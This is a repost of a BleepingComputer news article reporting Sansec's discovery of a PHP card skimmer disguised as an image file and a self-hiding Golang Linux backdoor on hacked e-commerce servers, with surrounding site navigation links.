Nov 19, 2021
89 Views
0 0

Hackers deploy Linux malware, web skimmer on e-commerce servers

Written by

US indicts Iranian hackers for Proud Boys voter intimidation emails
Winamp prepares a relaunch, new beta version almost ready
FBI warns of APT group exploiting FatPipe VPN zero-day since May
Windows 10 21H2 is released, here are the new features
Microsoft: Windows Installer breaks apps after updates, repairs
Android malware BrazKing returns as a stealthier banking trojan
US indicts Iranian hackers for Proud Boys voter intimidation emails
Winamp prepares a relaunch, new beta version almost ready
Qualys BrowserCheck
STOPDecrypter
AuroraDecrypter
FilesLockerDecrypter
AdwCleaner
ComboFix
RKill
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Toksearches.xyz Search Redirect
Remove the Smashapps.net Search Redirect
Remove the Smashappsearch.com Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
eLearning
IT Certification Courses
Gear + Gadgets
Security
Hackers deploy Linux malware, web skimmer on e-commerce servers
Security researchers discovered that attackers are also deploying a Linux backdoor on compromised e-commerce servers after injecting a credit card skimmer into online shops’ websites.
The PHP-coded web skimmer (a script designed to steal and exfiltrate customers’ payment and personal info) is added and camouflaged as a .JPG image file in the /app/design/frontend/ folder.
The attackers use this script to download and inject fake payment forms on checkout pages displayed to customers by the hacked online shop.
“We found that the attacker started with automated eCommerce attack probes, testing for dozens of weaknesses in common online store platforms,” the Sansec Threat Research Team revealed.
“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a webshell and modified the server code to intercept customer data.”
Sansec - linux_avp Linux Golang malware
The Golang-based malware, spotted by Dutch cyber-security company Sansec on the same server, was downloaded and executed on breached servers as a linux_avp executable.
Once launched, it immediately removes itself from the disk and camouflages itself as a “ps -ef” process that would be used to get a list of currently-running processes.
While analyzing the linux_avp backdoor, Sansec found that it waits for commands from a Beijing server hosted on Alibaba’s network.
They also discovered that the malware would gain persistence by adding a new crontab entry that would redownload the malicious payload from its command-and-control server and reinstall the backdoor if detected and removed or the server restarts.
Until now, this backdoor remains undetected by anti-malware engines on VirusTotal even though a sample was first uploaded more than one month ago, on October 8th.
The uploader might be the linux_avp creator since it was submitted one day after researchers at Dutch cyber-security company Sansec spotted it while investigating the e-commerce site breach.
Invisible characters could be hiding backdoors in your JavaScript code
Microsoft: WizardUpdate Mac malware adds new evasion tactics
State-backed hackers breach telcos with custom malware
FontOnLake malware infects Linux systems via trojanized utilities
New UEFI bootkit used to backdoor Windows devices since 2012
Not a member yet? Register Now
Russian ransomware gangs start collaborating with Chinese hackers
US, UK warn of Iranian hackers exploiting Microsoft Exchange, Fortinet
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.

source

Article Categories:
Cybersecurity News

Comments are closed.